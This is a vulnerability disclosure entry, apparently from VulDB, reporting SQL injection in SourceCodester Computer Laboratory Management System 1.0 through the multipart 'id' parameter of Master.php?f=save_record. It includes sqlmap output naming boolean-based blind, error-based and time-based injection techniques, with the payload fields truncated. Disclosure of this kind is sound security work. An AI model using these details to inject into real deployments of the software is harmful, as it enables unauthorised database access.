| Title | SourceCodester Computer Laboratory Management System 1.0 SQL Injection |
|---|
| Description | ## Details
### Related Code file:
`/lms/classes/Master.php?f=save_record
## Injection parameter:
`MULTIPART id`
## sqlmap findings:
```
Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"
```
## Report link: https://reports-kunull.vercel.app/CVE%20research/computer-laboratory-management-system-save_record |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html |
|---|
| User | Anonymous User |
|---|
| Submission | 07/15/2024 08:57 (2 years ago) |
|---|
| Moderation | 07/16/2024 21:20 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 271704 [SourceCodester Computer Laboratory Management System 1.0 Master.php?f=save_record ID sql injection] |
|---|
| Points | 20 |
|---|